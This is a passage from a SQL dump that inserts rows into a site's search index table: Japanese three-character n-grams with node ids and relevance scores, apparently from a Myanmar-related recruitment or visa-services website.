('ックや', 23, 'ja', 'node_search', 0.927431),
('ックを', 133, 'ja', 'node_search', 0.997306),
('ッショ', 25, 'ja', 'node_search', 34),
('ッショ', 116, 'ja', 'node_search', 1),
('ッショ', 142, 'ja', 'node_search', 0.968904),
('ッジの', 10, 'ja', 'node_search', 1),
('ッジホ', 18, 'ja', 'node_search', 3),
('ッスン', 122, 'ja', 'node_search', 0.997306),
('ッスン', 142, 'ja', 'node_search', 1),
('ッセン', 155, 'ja', 'node_search', 0.668514),
('ッチか', 19, 'ja', 'node_search', 28),
('ッチの', 95, 'ja', 'node_search', 1),
('ッチの', 133, 'ja', 'node_search', 0.96498),
('ッチの', 138, 'ja', 'node_search', 19),
('ッチン', 135, 'ja', 'node_search', 0.997306),
('ッチ実', 133, 'ja', 'node_search', 19),
('ッチ理', 140, 'ja', 'node_search', 19),
('ットに', 138, 'ja', 'node_search', 1),
('ットは', 133, 'ja', 'node_search', 0.727213),
('ットを', 133, 'ja', 'node_search', 0.827757),
('ットエ', 135, 'ja', 'node_search', 2.41121),
('ットエ', 136, 'ja', 'node_search', 1.6916),
('ットト', 23, 'ja', 'node_search', 2.0823),
('ットト', 24, 'ja', 'node_search', 1.46543),
('ットワ', 24, 'ja', 'node_search', 0.508221),
('ット商', 9, 'ja', 'node_search', 28),
('ット商', 17, 'ja', 'node_search', 29),
('ット建', 23, 'ja', 'node_search', 0.752312),
('ット日', 181, 'ja', 'node_search', 1.7974),
('ット日', 182, 'ja', 'node_search', 4.2327),
('ット日', 183, 'ja', 'node_search', 3.98118),
('ット自', 23, 'ja', 'node_search', 1),
('ット語', 142, 'ja', 'node_search', 19),
('ッフ一', 156, 'ja', 'node_search', 1),
('ッフ一', 157, 'ja', 'node_search', 0.879565),
('ッフ募', 162, 'ja', 'node_search', 31),
('ッフ募', 163, 'ja', 'node_search', 27),
('ップで', 122, 'ja', 'node_search', 1),
('ップで', 182, 'ja', 'node_search', 0.927431),
('ップの', 116, 'ja', 'node_search', 1),
('ップは', 116, 'ja', 'node_search', 1),
('ップク', 142, 'ja', 'node_search', 0.98493),
('ッヤシ', 23, 'ja', 'node_search', 0.740689),
('ッ建設', 27, 'ja', 'node_search', 0.722831),
('ティカ', 10, 'ja', 'node_search', 1),
('ティッ', 27, 'ja', 'node_search', 0.727213),
('ティブ', 5, 'ja', 'node_search', 0.797402),
('ティブ', 133, 'ja', 'node_search', 1),
('ティブ', 136, 'ja', 'node_search', 1.74529),
('ティブ', 138, 'ja', 'node_search', 0.819249),
('ティー', 23, 'ja', 'node_search', 0.727213),
('ティ業', 155, 'ja', 'node_search', 0.733888),
('テイビ', 126, 'ja', 'node_search', 1),
('テゴリ', 7, 'ja', 'node_search', 1.8861),
('テスを', 18, 'ja', 'node_search', 3),
('テスト', 19, 'ja', 'node_search', 3),
('テップ', 182, 'ja', 'node_search', 0.931053),
('テリア', 27, 'ja', 'node_search', 0.380175),
('テルで', 18, 'ja', 'node_search', 28),
('テル分', 155, 'ja', 'node_search', 28),
('テル特', 155, 'ja', 'node_search', 5.75707),
('テル関', 24, 'ja', 'node_search', 0.595774),
('テージ', 185, 'ja', 'node_search', 1),
('ディネ', 30, 'ja', 'node_search', 1),
('ディン', 11, 'ja', 'node_search', 19),
('ディン', 17, 'ja', 'node_search', 1),
('ディン', 19, 'ja', 'node_search', 1),
('ディン', 23, 'ja', 'node_search', 3.0823),
('ディン', 24, 'ja', 'node_search', 1.46543),
('ディン', 25, 'ja', 'node_search', 1),
('ディン', 27, 'ja', 'node_search', 1),
('ディン', 154, 'ja', 'node_search', 1.84832),
('ディン', 160, 'ja', 'node_search', 1.83938),
('ディン', 161, 'ja', 'node_search', 1.8861),
('ディン', 162, 'ja', 'node_search', 1.63167),
('ディン', 163, 'ja', 'node_search', 1),
('ディン', 164, 'ja', 'node_search', 1.81367),
('ディン', 165, 'ja', 'node_search', 1.80545),
('ディン', 166, 'ja', 'node_search', 1),
('ディン', 167, 'ja', 'node_search', 1.88282),
('ディン', 168, 'ja', 'node_search', 1),
('ディン', 169, 'ja', 'node_search', 1),
('ディン', 170, 'ja', 'node_search', 1),
('ディン', 171, 'ja', 'node_search', 1),
('ディン', 173, 'ja', 'node_search', 1.8249),
('ディン', 174, 'ja', 'node_search', 1.77419),
('ディン', 175, 'ja', 'node_search', 1.83353),
('ディン', 176, 'ja', 'node_search', 1.80007),
('ディン', 177, 'ja', 'node_search', 1),
('ディン', 178, 'ja', 'node_search', 1),
('ディン', 179, 'ja', 'node_search', 1.96109),
('ディン', 180, 'ja', 'node_search', 1),
('ディン', 184, 'ja', 'node_search', 1),
('ディン', 185, 'ja', 'node_search', 1),
('ディン', 186, 'ja', 'node_search', 1.92027),
('ディン', 187, 'ja', 'node_search', 1),
('ディン', 188, 'ja', 'node_search', 1),
('ディン', 189, 'ja', 'node_search', 1),
('ディン', 190, 'ja', 'node_search', 1),
('ディン', 191, 'ja', 'node_search', 1),
('ディン', 192, 'ja', 'node_search', 1),
('ディン', 193, 'ja', 'node_search', 1),
('ディン', 194, 'ja', 'node_search', 1),
('ディン', 195, 'ja', 'node_search', 1),
('ディン', 196, 'ja', 'node_search', 1),
('ディン', 197, 'ja', 'node_search', 1),
('ディン', 198, 'ja', 'node_search', 1),
('ディン', 199, 'ja', 'node_search', 1),
('ディン', 200, 'ja', 'node_search', 1),
('ディ地', 27, 'ja', 'node_search', 2.02415),
('デザイ', 27, 'ja', 'node_search', 0.776448),
('データ', 30, 'ja', 'node_search', 1.84234),
('トから', 27, 'ja', 'node_search', 0.416268),
('トが実', 27, 'ja', 'node_search', 0.465433),
('トされ', 164, 'ja', 'node_search', 1),
('トされ', 167, 'ja', 'node_search', 1),
('トされ', 169, 'ja', 'node_search', 0.993146),
('トされ', 171, 'ja', 'node_search', 1),
('トされ', 173, 'ja', 'node_search', 0.953396),
('トされ', 174, 'ja', 'node_search', 1),
('トされ', 176, 'ja', 'node_search', 1),
('トされ', 177, 'ja', 'node_search', 1),
('トして', 5, 'ja', 'node_search', 0.830633),
('トして', 23, 'ja', 'node_search', 0.51578),
('トして', 80, 'ja', 'node_search', 1),
('トして', 186, 'ja', 'node_search', 0.851346),
('トしま', 62, 'ja', 'node_search', 0.916736),
('トする', 1, 'ja', 'node_search', 0.96498),
('トする', 138, 'ja', 'node_search', 0.662985),
('トだけ', 62, 'ja', 'node_search', 0.742984),
('トでも', 196, 'ja', 'node_search', 0.902857),
('トと候', 25, 'ja', 'node_search', 1),
('トと日', 156, 'ja', 'node_search', 1),
('トと日', 157, 'ja', 'node_search', 1),
('トな振', 87, 'ja', 'node_search', 0.889397),
('トにお', 27, 'ja', 'node_search', 0.449147),
('トに合', 138, 'ja', 'node_search', 0.997306),
('トに従', 27, 'ja', 'node_search', 0.377261),
('トの受', 19, 'ja', 'node_search', 3),
('トは以', 27, 'ja', 'node_search', 0.372694),
('トや候', 25, 'ja', 'node_search', 1),
('トをお', 1, 'ja', 'node_search', 1),
('トを代', 133, 'ja', 'node_search', 0.824901),
('トを建', 27, 'ja', 'node_search', 0.405257),
('トを心', 154, 'ja', 'node_search', 1),
('トを持', 5, 'ja', 'node_search', 28),
('トを練', 138, 'ja', 'node_search', 0.781775),
('トを行', 162, 'ja', 'node_search', 0.909743),
('トアシ', 30, 'ja', 'node_search', 0.873132),
('トエー', 135, 'ja', 'node_search', 2.41121),
('トエー', 136, 'ja', 'node_search', 1.6916),
('トクテ', 126, 'ja', 'node_search', 1),
('トセー', 27, 'ja', 'node_search', 5.16839),
('トトレ', 23, 'ja', 'node_search', 2.0823),
('トトレ', 24, 'ja', 'node_search', 1.46543),
('トナー', 25, 'ja', 'node_search', 1),
('トピッ', 133, 'ja', 'node_search', 1),
('トラク', 27, 'ja', 'node_search', 24.7017),
('トラク', 135, 'ja', 'node_search', 1),
('トラク', 136, 'ja', 'node_search', 1),
('トラッ', 23, 'ja', 'node_search', 0.934703),
('トラッ', 27, 'ja', 'node_search', 0.326027),
('トラン', 24, 'ja', 'node_search', 0.59873),
('トラン', 68, 'ja', 'node_search', 1),
('トラン', 70, 'ja', 'node_search', 1),
('トラン', 71, 'ja', 'node_search', 1),
('トラン', 72, 'ja', 'node_search', 1),
('トラン', 73, 'ja', 'node_search', 1),
('トラン', 74, 'ja', 'node_search', 1),
('トラン', 75, 'ja', 'node_search', 1),
('トラン', 77, 'ja', 'node_search', 4),
('トラン', 81, 'ja', 'node_search', 4),
('トラン', 82, 'ja', 'node_search', 1),
('トラン', 84, 'ja', 'node_search', 1),
('トラン', 90, 'ja', 'node_search', 1),
('トラン', 95, 'ja', 'node_search', 1),
('トラン', 98, 'ja', 'node_search', 19),
('トラン', 100, 'ja', 'node_search', 4),
('トラン', 104, 'ja', 'node_search', 7),
('トラン', 106, 'ja', 'node_search', 1),
('トラン', 107, 'ja', 'node_search', 1),
('トラン', 109, 'ja', 'node_search', 1),
('トラン', 110, 'ja', 'node_search', 1),
('トラン', 112, 'ja', 'node_search', 1),
('トラン', 114, 'ja', 'node_search', 1),
('トラン', 116, 'ja', 'node_search', 19),
('トラン', 117, 'ja', 'node_search', 1),
('トラン', 118, 'ja', 'node_search', 1),
('トラン', 119, 'ja', 'node_search', 1),
('トラン', 122, 'ja', 'node_search', 19),
('トラン', 123, 'ja', 'node_search', 1),
('トラン', 125, 'ja', 'node_search', 1),
('トラン', 131, 'ja', 'node_search', 1),
('トラン', 133, 'ja', 'node_search', 1),
('トラン', 135, 'ja', 'node_search', 1.77419),
('トラン', 136, 'ja', 'node_search', 1),
('トラン', 138, 'ja', 'node_search', 1),
('トラン', 140, 'ja', 'node_search', 1),
('トラン', 143, 'ja', 'node_search', 1),
('トラン', 144, 'ja', 'node_search', 1),
('トレン', 23, 'ja', 'node_search', 1.64521),
('トレン', 24, 'ja', 'node_search', 1.46543),
('トレー', 11, 'ja', 'node_search', 19),
('トレー', 17, 'ja', 'node_search', 1),
('トレー', 19, 'ja', 'node_search', 1),
('トレー', 23, 'ja', 'node_search', 1.43709),
('トレー', 24, 'ja', 'node_search', 1.65788),
('トレー', 27, 'ja', 'node_search', 1),
('トレー', 62, 'ja', 'node_search', 0.733888),
('トレー', 133, 'ja', 'node_search', 0.759465),
('トレー', 136, 'ja', 'node_search', 1),
('トレー', 154, 'ja', 'node_search', 1.84832),
('トレー', 160, 'ja', 'node_search', 1.83938),
('トレー', 161, 'ja', 'node_search', 1.8861),
('トレー', 162, 'ja', 'node_search', 1.63167),
('トレー', 163, 'ja', 'node_search', 1),
('トレー', 164, 'ja', 'node_search', 1.81367),
('トレー', 165, 'ja', 'node_search', 1.80545),
('トレー', 166, 'ja', 'node_search', 1),
('トレー', 167, 'ja', 'node_search', 1.88282),
('トレー', 168, 'ja', 'node_search', 1),
('トレー', 169, 'ja', 'node_search', 1),
('トレー', 170, 'ja', 'node_search', 1),
('トレー', 171, 'ja', 'node_search', 1),
('トレー', 173, 'ja', 'node_search', 1.8249),
('トレー', 174, 'ja', 'node_search', 1.77419),
('トレー', 175, 'ja', 'node_search', 1.83353),
('トレー', 176, 'ja', 'node_search', 1.80007),
('トレー', 177, 'ja', 'node_search', 1),
('トレー', 178, 'ja', 'node_search', 1),
('トレー', 179, 'ja', 'node_search', 1.96109),
('トレー', 180, 'ja', 'node_search', 1),
('トレー', 184, 'ja', 'node_search', 1),
('トレー', 185, 'ja', 'node_search', 1),
('トレー', 186, 'ja', 'node_search', 1.92027),
('トレー', 187, 'ja', 'node_search', 1),
('トレー', 188, 'ja', 'node_search', 1),
('トレー', 189, 'ja', 'node_search', 1),
('トレー', 190, 'ja', 'node_search', 1),
('トレー', 191, 'ja', 'node_search', 1),
('トレー', 192, 'ja', 'node_search', 1),
('トレー', 193, 'ja', 'node_search', 1),
('トレー', 194, 'ja', 'node_search', 1),
('トレー', 195, 'ja', 'node_search', 1),
('トレー', 196, 'ja', 'node_search', 1),
('トレー', 197, 'ja', 'node_search', 1),
('トレー', 198, 'ja', 'node_search', 1),
('トレー', 199, 'ja', 'node_search', 1),
('トレー', 200, 'ja', 'node_search', 1),
('トワー', 24, 'ja', 'node_search', 0.507159),
('ト作成', 24, 'ja', 'node_search', 0.863659),
('ト削減', 27, 'ja', 'node_search', 0.431687),
('ト協力', 27, 'ja', 'node_search', 0.699655),
('ト商社', 9, 'ja', 'node_search', 28),
('ト商社', 17, 'ja', 'node_search', 29),
('ト建築', 23, 'ja', 'node_search', 0.749958),
('ト施設', 155, 'ja', 'node_search', 1),
('ト日本', 181, 'ja', 'node_search', 1.7974),
('ト日本', 182, 'ja', 'node_search', 4.2327),
('ト日本', 183, 'ja', 'node_search', 3.98118),
('ト的で', 135, 'ja', 'node_search', 0.714225),
('ト自動', 23, 'ja', 'node_search', 1),
('ト語学', 142, 'ja', 'node_search', 19),
('ドに負', 25, 'ja', 'node_search', 1),
('ドに負', 26, 'ja', 'node_search', 1),
('ドを持', 3, 'ja', 'node_search', 1),
('ドバイ', 18, 'ja', 'node_search', 28),
('ドバイ', 23, 'ja', 'node_search', 0.536316),
('ドバイ', 24, 'ja', 'node_search', 0.580033),
('ドバイ', 120, 'ja', 'node_search', 1),
('ドマス', 62, 'ja', 'node_search', 1.15316),
('ドミン', 30, 'ja', 'node_search', 0.892724),
('ドー職', 27, 'ja', 'node_search', 0.372131),
('ドー連', 27, 'ja', 'node_search', 0.953396),
('ナポン', 27, 'ja', 'node_search', 0.36879),
('ナリオ', 135, 'ja', 'node_search', 0.938382),
('ナルの', 116, 'ja', 'node_search', 1),
('ナーと', 25, 'ja', 'node_search', 1),
('ナーに', 155, 'ja', 'node_search', 0.989021),
('ニアに', 24, 'ja', 'node_search', 0.677939),
('ニアの', 10, 'ja', 'node_search', 28),
('ニアを', 10, 'ja', 'node_search', 3),
('ニケー', 18, 'ja', 'node_search', 1),
('ニケー', 24, 'ja', 'node_search', 0.414157),
('ニティ', 10, 'ja', 'node_search', 1),
('ニュー', 9, 'ja', 'node_search', 28),
('ニュー', 11, 'ja', 'node_search', 19),
('ニュー', 17, 'ja', 'node_search', 30),
('ニュー', 19, 'ja', 'node_search', 1),
('ニュー', 23, 'ja', 'node_search', 4.83461),
('ニュー', 24, 'ja', 'node_search', 1.46543),
('ニュー', 27, 'ja', 'node_search', 26.9308),
('ニュー', 133, 'ja', 'node_search', 1.56956),
('ニュー', 135, 'ja', 'node_search', 2.41121),
('ニュー', 136, 'ja', 'node_search', 1.6916),
('ニュー', 138, 'ja', 'node_search', 2),
('ニュー', 154, 'ja', 'node_search', 1.84832),
('ニュー', 155, 'ja', 'node_search', 1),
('ニュー', 160, 'ja', 'node_search', 1.83938),
('ニュー', 161, 'ja', 'node_search', 1.8861),
('ニュー', 162, 'ja', 'node_search', 1.63167),
('ニュー', 163, 'ja', 'node_search', 1),
('ニュー', 164, 'ja', 'node_search', 1.81367),
('ニュー', 165, 'ja', 'node_search', 1.80545),
('ニュー', 166, 'ja', 'node_search', 1),
('ニュー', 167, 'ja', 'node_search', 1.88282),
('ニュー', 168, 'ja', 'node_search', 1),
('ニュー', 169, 'ja', 'node_search', 1),
('ニュー', 170, 'ja', 'node_search', 1),
('ニュー', 171, 'ja', 'node_search', 1),
('ニュー', 173, 'ja', 'node_search', 1.8249),
('ニュー', 174, 'ja', 'node_search', 1.77419),
('ニュー', 175, 'ja', 'node_search', 1.83353),
('ニュー', 176, 'ja', 'node_search', 1.80007),
('ニュー', 177, 'ja', 'node_search', 1),
('ニュー', 178, 'ja', 'node_search', 1),
('ニュー', 179, 'ja', 'node_search', 1.96109),
('ニュー', 180, 'ja', 'node_search', 1),
('ニュー', 181, 'ja', 'node_search', 1.7974),
('ニュー', 182, 'ja', 'node_search', 4.2327),
('ニュー', 183, 'ja', 'node_search', 3.98118),
('ニュー', 184, 'ja', 'node_search', 1),
('ニュー', 185, 'ja', 'node_search', 1),
('ニュー', 186, 'ja', 'node_search', 1.92027),
('ニュー', 187, 'ja', 'node_search', 1),
('ニュー', 188, 'ja', 'node_search', 1),
('ニュー', 189, 'ja', 'node_search', 1),
('ニュー', 190, 'ja', 'node_search', 1),
('ニュー', 191, 'ja', 'node_search', 1),
('ニュー', 192, 'ja', 'node_search', 1),
('ニュー', 193, 'ja', 'node_search', 1),
('ニュー', 194, 'ja', 'node_search', 1),
('ニュー', 195, 'ja', 'node_search', 1),
('ニュー', 196, 'ja', 'node_search', 1),
('ニュー', 197, 'ja', 'node_search', 1),
('ニュー', 198, 'ja', 'node_search', 1),
('ニュー', 199, 'ja', 'node_search', 1),
('ニュー', 200, 'ja', 'node_search', 1),
('ニング', 24, 'ja', 'node_search', 1.65434),
('ニング', 62, 'ja', 'node_search', 0.727213),
('ニング', 133, 'ja', 'node_search', 0.752312),
('ニング', 136, 'ja', 'node_search', 1),
('ネイテ', 133, 'ja', 'node_search', 1),
('ネイテ', 136, 'ja', 'node_search', 1.74529),
('ネイテ', 138, 'ja', 'node_search', 0.824901),
('ネギの', 163, 'ja', 'node_search', 0.953396),
('ネスも', 87, 'ja', 'node_search', 0.655756),
('ネス表', 24, 'ja', 'node_search', 0.433216),
('ネット', 24, 'ja', 'node_search', 0.509287),
('ネピド', 27, 'ja', 'node_search', 1.33322),
('ネーウ', 23, 'ja', 'node_search', 0.714225),
('ネータ', 30, 'ja', 'node_search', 1),
('バイま', 18, 'ja', 'node_search', 28),
('バイス', 120, 'ja', 'node_search', 1),
('バスや', 23, 'ja', 'node_search', 0.886095),
('バッチ', 19, 'ja', 'node_search', 28),
('バッチ', 95, 'ja', 'node_search', 1),
('バッチ', 133, 'ja', 'node_search', 19.965),
('バッチ', 138, 'ja', 'node_search', 19),
('バッチ', 140, 'ja', 'node_search', 19),
('バレッ', 18, 'ja', 'node_search', 3),
('パスポ', 5, 'ja', 'node_search', 28),
('パスポ', 24, 'ja', 'node_search', 0.876337),
('パソコ', 24, 'ja', 'node_search', 0.541108),
('パート', 25, 'ja', 'node_search', 1),
('パーミ', 30, 'ja', 'node_search', 0.906287),
('ビザで', 3, 'ja', 'node_search', 0.769219),
('ビザで', 7, 'ja', 'node_search', 11.3575),
('ビザで', 24, 'ja', 'node_search', 1.07943),
('ビザで', 126, 'ja', 'node_search', 1),
('ビザな', 24, 'ja', 'node_search', 0.652202),
('ビザに', 3, 'ja', 'node_search', 2.90006),
('ビザの', 62, 'ja', 'node_search', 0.707906),
('ビザは', 3, 'ja', 'node_search', 0.707906),
('ビザは', 7, 'ja', 'node_search', 28.8861),
('ビザや', 23, 'ja', 'node_search', 0.449975),
('ビザを', 6, 'ja', 'node_search', 28),
('ビザを', 23, 'ja', 'node_search', 0.445866),
('ビザを', 111, 'ja', 'node_search', 1),
('ビザポ', 19, 'ja', 'node_search', 3),
('ビザ保', 3, 'ja', 'node_search', 1.21186),
('ビジネ', 24, 'ja', 'node_search', 0.434757),
('ビジネ', 62, 'ja', 'node_search', 0.541108),
('ビジネ', 87, 'ja', 'node_search', 0.659351),
('ビスの', 23, 'ja', 'node_search', 1),
('ビスの', 162, 'ja', 'node_search', 0.824901),
('ビスや', 1, 'ja', 'node_search', 1),
('ビスを', 24, 'ja', 'node_search', 0.485867),
('ビス株', 23, 'ja', 'node_search', 1),
('ビス株', 27, 'ja', 'node_search', 2.00072),
('ビス業', 7, 'ja', 'node_search', 1.8861),
('ビバレ', 18, 'ja', 'node_search', 3),
('ビュー', 88, 'ja', 'help_search', 4),
('ビュー', 89, 'ja', 'help_search', 4),
('ビュー', 90, 'ja', 'help_search', 4),
('ビュー', 91, 'ja', 'help_search', 4),
('ビルダ', 27, 'ja', 'node_search', 0.395463),
('ビルマ', 3, 'ja', 'node_search', 0.513597),
('ビース', 24, 'ja', 'node_search', 0.492759),
('ピィー', 27, 'ja', 'node_search', 6.55554),
('ピタリ', 155, 'ja', 'node_search', 0.740689),
('ピック', 133, 'ja', 'node_search', 1),
('ピドー', 27, 'ja', 'node_search', 1.32936),
('ピュー', 24, 'ja', 'node_search', 0.381353),
('ピュー', 30, 'ja', 'node_search', 1.84234),
('ピーカ', 136, 'ja', 'node_search', 1.74529),
('ピーカ', 138, 'ja', 'node_search', 0.816452),
('ピーキ', 138, 'ja', 'node_search', 19.9458),
('ピーチ', 9, 'ja', 'node_search', 3),
('ピーチ', 17, 'ja', 'node_search', 4),
('ピーテ', 23, 'ja', 'node_search', 0.731649),
('ピード', 62, 'ja', 'node_search', 1.15594),
('ファイ', 30, 'ja', 'node_search', 1.84234),
('ファミ', 62, 'ja', 'node_search', 0.509287);
INSERT INTO `search_index` (`word`, `sid`, `langcode`, `type`, `score`) VALUES
('フィス', 5, 'ja', 'node_search', 0.882818),
('フィス', 7, 'ja', 'node_search', 1.8861),
('フェッ', 116, 'ja', 'node_search', 1),
('フェリ', 5, 'ja', 'node_search', 0.851346),
('フト制', 162, 'ja', 'node_search', 0.697623),
('フト制', 163, 'ja', 'node_search', 0.786915),
('フライ', 156, 'ja', 'node_search', 1),
('フライ', 157, 'ja', 'node_search', 1),
('フード', 18, 'ja', 'node_search', 3),
('フ一同', 156, 'ja', 'node_search', 0.997306),
('フ一同', 157, 'ja', 'node_search', 0.876337),
('フ募集', 162, 'ja', 'node_search', 31),
('フ募集', 163, 'ja', 'node_search', 27),
('ブな方', 5, 'ja', 'node_search', 0.792123),
('ブサイ', 1, 'ja', 'node_search', 54),
('ブスピ', 136, 'ja', 'node_search', 1.74529),
('ブダビ', 18, 'ja', 'node_search', 28),
('ブ講師', 133, 'ja', 'node_search', 1),
('プでは', 122, 'ja', 'node_search', 1),
('プでも', 182, 'ja', 'node_search', 0.923838),
('プのイ', 116, 'ja', 'node_search', 1),
('プの一', 23, 'ja', 'node_search', 1.75707),
('プクイ', 142, 'ja', 'node_search', 0.980874),
('プレイ', 135, 'ja', 'node_search', 0.96498),
('プログ', 179, 'ja', 'node_search', 1),
('プロジ', 27, 'ja', 'node_search', 3.50969),
('プロジ', 30, 'ja', 'node_search', 1),
('プロフ', 116, 'ja', 'node_search', 1),
('プロー', 136, 'ja', 'node_search', 1),
('プロー', 138, 'ja', 'node_search', 1),
('プ企業', 27, 'ja', 'node_search', 1),
('プ活動', 135, 'ja', 'node_search', 1),
('プ活動', 138, 'ja', 'node_search', 1),
('ベルの', 163, 'ja', 'node_search', 0.725015),
('ベーシ', 120, 'ja', 'node_search', 0.96498),
('ペレー', 30, 'ja', 'node_search', 1),
('ページ', 155, 'ja', 'node_search', 0.677939),
('ホステ', 18, 'ja', 'node_search', 3),
('ホスピ', 155, 'ja', 'node_search', 0.745294),
('ホテル', 18, 'ja', 'node_search', 28),
('ホテル', 24, 'ja', 'node_search', 0.597248),
('ホテル', 155, 'ja', 'node_search', 34.7571),
('ボガレ', 27, 'ja', 'node_search', 0.356021),
('ポジシ', 5, 'ja', 'node_search', 3),
('ポジシ', 10, 'ja', 'node_search', 3),
('ポジシ', 19, 'ja', 'node_search', 3),
('ポップ', 142, 'ja', 'node_search', 0.989021),
('ポン大', 27, 'ja', 'node_search', 0.36824),
('ポート', 1, 'ja', 'node_search', 0.972861),
('ポート', 5, 'ja', 'node_search', 28.8335),
('ポート', 23, 'ja', 'node_search', 0.517983),
('ポート', 24, 'ja', 'node_search', 0.869951),
('ポート', 30, 'ja', 'node_search', 0.879565),
('ポート', 62, 'ja', 'node_search', 1.66913),
('ポート', 80, 'ja', 'node_search', 1),
('ポート', 135, 'ja', 'node_search', 0.718502),
('ポート', 138, 'ja', 'node_search', 0.66666),
('ポート', 162, 'ja', 'node_search', 1.66669),
('ポート', 186, 'ja', 'node_search', 0.857458),
('ポール', 5, 'ja', 'node_search', 4),
('ポール', 23, 'ja', 'node_search', 0.528135),
('ポール', 24, 'ja', 'node_search', 0.570448),
('ポール', 30, 'ja', 'node_search', 28),
('マイズ', 62, 'ja', 'node_search', 4),
('マウビ', 27, 'ja', 'node_search', 0.352969),
('マスタ', 24, 'ja', 'node_search', 0.398027),
('マスタ', 62, 'ja', 'node_search', 3.65675),
('マナー', 155, 'ja', 'node_search', 0.993146),
('マライ', 9, 'ja', 'node_search', 3),
('マライ', 17, 'ja', 'node_search', 4),
('マライ', 23, 'ja', 'node_search', 0.585658),
('マライ', 24, 'ja', 'node_search', 1),
('マレー', 23, 'ja', 'node_search', 0.535131),
('マレー', 24, 'ja', 'node_search', 0.578643),
('マンダ', 27, 'ja', 'node_search', 1.35483),
('マーの', 23, 'ja', 'node_search', 0.513597),
('マーの', 26, 'ja', 'node_search', 1),
('マーの', 87, 'ja', 'node_search', 0.623497),
('マーを', 126, 'ja', 'node_search', 1),
('マート', 87, 'ja', 'node_search', 0.896076),
('マー人', 154, 'ja', 'node_search', 0.830633),
('マー人', 160, 'ja', 'node_search', 0.816452),
('マー人', 161, 'ja', 'node_search', 0.860547),
('マー人', 164, 'ja', 'node_search', 0.792123),
('マー人', 165, 'ja', 'node_search', 0.78951),
('マー人', 167, 'ja', 'node_search', 0.863659),
('マー人', 173, 'ja', 'node_search', 0.802752),
('マー人', 174, 'ja', 'node_search', 0.759465),
('マー人', 175, 'ja', 'node_search', 0.810915),
('マー人', 176, 'ja', 'node_search', 0.779231),
('マー人', 179, 'ja', 'node_search', 0.938382),
('マー全', 23, 'ja', 'node_search', 0.636679),
('マー全', 24, 'ja', 'node_search', 1),
('マ語で', 3, 'ja', 'node_search', 0.511433),
('ミッシ', 25, 'ja', 'node_search', 34),
('ミット', 30, 'ja', 'node_search', 0.899454),
('ミャイ', 24, 'ja', 'node_search', 0.351964),
('ミャワ', 27, 'ja', 'node_search', 0.36769),
('ミャン', 3, 'ja', 'node_search', 1),
('ミャン', 23, 'ja', 'node_search', 1.15537),
('ミャン', 24, 'ja', 'node_search', 1),
('ミャン', 26, 'ja', 'node_search', 1),
('ミャン', 87, 'ja', 'node_search', 0.628375),
('ミャン', 126, 'ja', 'node_search', 1),
('ミャン', 154, 'ja', 'node_search', 0.839384),
('ミャン', 160, 'ja', 'node_search', 0.824901),
('ミャン', 161, 'ja', 'node_search', 0.869951),
('ミャン', 164, 'ja', 'node_search', 0.800068),
('ミャン', 165, 'ja', 'node_search', 0.797402),
('ミャン', 167, 'ja', 'node_search', 0.873132),
('ミャン', 173, 'ja', 'node_search', 0.810915),
('ミャン', 174, 'ja', 'node_search', 0.766757),
('ミャン', 175, 'ja', 'node_search', 0.819249),
('ミャン', 176, 'ja', 'node_search', 0.786915),
('ミャン', 179, 'ja', 'node_search', 0.949597),
('ミュニ', 10, 'ja', 'node_search', 1),
('ミュニ', 18, 'ja', 'node_search', 1),
('ミュニ', 24, 'ja', 'node_search', 0.415562),
('ミリー', 62, 'ja', 'node_search', 0.507159),
('ミンサ', 30, 'ja', 'node_search', 0.889397),
('ムにお', 179, 'ja', 'node_search', 1),
('ムを監', 142, 'ja', 'node_search', 0.650439),
('ムレス', 135, 'ja', 'node_search', 0.703756),
('メッセ', 155, 'ja', 'node_search', 0.670377),
('メット', 9, 'ja', 'node_search', 28),
('メット', 11, 'ja', 'node_search', 19),
('メット', 17, 'ja', 'node_search', 30),
('メット', 19, 'ja', 'node_search', 1),
('メット', 23, 'ja', 'node_search', 4.83461),
('メット', 24, 'ja', 'node_search', 1.46543),
('メット', 27, 'ja', 'node_search', 20.3541),
('メット', 133, 'ja', 'node_search', 1.55785),
('メット', 135, 'ja', 'node_search', 2.41121),
('メット', 136, 'ja', 'node_search', 1.6916),
('メット', 138, 'ja', 'node_search', 2),
('メット', 142, 'ja', 'node_search', 19),
('メット', 154, 'ja', 'node_search', 1.84832),
('メット', 155, 'ja', 'node_search', 1),
('メット', 160, 'ja', 'node_search', 1.83938),
('メット', 161, 'ja', 'node_search', 1.8861),
('メット', 162, 'ja', 'node_search', 1.63167),
('メット', 163, 'ja', 'node_search', 1),
('メット', 164, 'ja', 'node_search', 1.81367),
('メット', 165, 'ja', 'node_search', 1.80545),
('メット', 166, 'ja', 'node_search', 1),
('メット', 167, 'ja', 'node_search', 1.88282),
('メット', 168, 'ja', 'node_search', 1),
('メット', 169, 'ja', 'node_search', 1),
('メット', 170, 'ja', 'node_search', 1),
('メット', 171, 'ja', 'node_search', 1),
('メット', 173, 'ja', 'node_search', 1.8249),
('メット', 174, 'ja', 'node_search', 1.77419),
('メット', 175, 'ja', 'node_search', 1.83353),
('メット', 176, 'ja', 'node_search', 1.80007),
('メット', 177, 'ja', 'node_search', 1),
('メット', 178, 'ja', 'node_search', 1),
('メット', 179, 'ja', 'node_search', 1.96109),
('メット', 180, 'ja', 'node_search', 1),
('メット', 181, 'ja', 'node_search', 1.7974),
('メット', 182, 'ja', 'node_search', 4.2327),
('メット', 183, 'ja', 'node_search', 3.98118),
('メット', 184, 'ja', 'node_search', 1),
('メット', 185, 'ja', 'node_search', 1),
('メット', 186, 'ja', 'node_search', 1.92027),
('メット', 187, 'ja', 'node_search', 1),
('メット', 188, 'ja', 'node_search', 1),
('メット', 189, 'ja', 'node_search', 1),
('メット', 190, 'ja', 'node_search', 1),
('メット', 191, 'ja', 'node_search', 1),
('メット', 192, 'ja', 'node_search', 1),
('メット', 193, 'ja', 'node_search', 1),
('メット', 194, 'ja', 'node_search', 1),
('メット', 195, 'ja', 'node_search', 1),
('メット', 196, 'ja', 'node_search', 1),
('メット', 197, 'ja', 'node_search', 1),
('メット', 198, 'ja', 'node_search', 1),
('メット', 199, 'ja', 'node_search', 1),
('メット', 200, 'ja', 'node_search', 1),
('メージ', 116, 'ja', 'node_search', 1),
('モチベ', 120, 'ja', 'node_search', 0.972861),
('モーラ', 24, 'ja', 'node_search', 0.353474),
('ャイン', 24, 'ja', 'node_search', 0.351463),
('ャット', 3, 'ja', 'node_search', 1),
('ャリア', 154, 'ja', 'node_search', 1),
('ャリア', 156, 'ja', 'node_search', 1),
